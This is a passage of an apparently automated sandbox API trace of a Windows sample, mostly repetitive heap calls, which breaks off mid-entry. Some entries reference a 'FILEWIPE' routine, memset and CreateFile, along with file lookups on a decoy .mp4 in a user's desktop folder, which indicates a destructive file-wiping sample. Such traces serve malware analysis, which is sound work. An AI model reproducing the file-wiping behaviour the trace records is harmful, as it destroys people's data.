1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0075.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.379] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.379] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.379] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.379] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\i_yvzxv2vbg06xdhag1z.mp4")) returned 0x20 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.379] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0x9aebd660, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x0, dwReserved1=0x657690, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 0x6b8b38 [0075.379] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.380] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.380] CharLowerBuffW (in: lpsz="byte[4160]", cchLength=0xa | out: lpsz="byte[4160]") returned 0xa [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.381] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.381] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.381] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.381] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.382] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb558, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.382] GetProcAddress (hModule=0x76f90000, lpProcName="memset") returned 0x76f99790 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.382] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.383] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b68 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.383] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.383] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.383] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.383] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.383] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.383] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 